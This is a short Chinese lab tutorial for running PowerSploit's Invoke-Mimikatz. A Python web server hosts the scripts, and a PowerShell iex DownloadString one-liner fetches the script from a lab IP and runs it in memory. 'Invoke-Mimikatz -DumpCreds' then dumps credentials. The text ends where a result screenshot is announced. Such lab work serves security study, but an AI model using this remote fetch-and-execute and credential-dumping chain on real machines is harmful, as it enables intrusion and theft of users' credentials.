實驗材料
服務器:win7
客戶端:windows server 2008
實驗環境:
在服務端搭建powershell腳本站點,在客戶端連接服務端的腳本,並執行命令
客戶端有python環境,客戶端與服務端有連接
實驗步驟:
- 從https://github.com/PowerShellMafia/PowerSploit下載腳本
- 在win7上安裝python環境
- 開啓python的web服務(利用python搭建一個站點) 進入到PowerSploit-master目錄裏面python -m http.server 80
#python3.7 - 測試web服務
- 在客戶端加載服務端腳本並執行
powershell加載iex(New-Object Net.WebClient).DownloadString(‘http://192.168.131.129/Exfiltration/Invoke-Mimikatz.ps1’)
執行: Invoke-Mimikatz -DumpCreds
效果圖如下: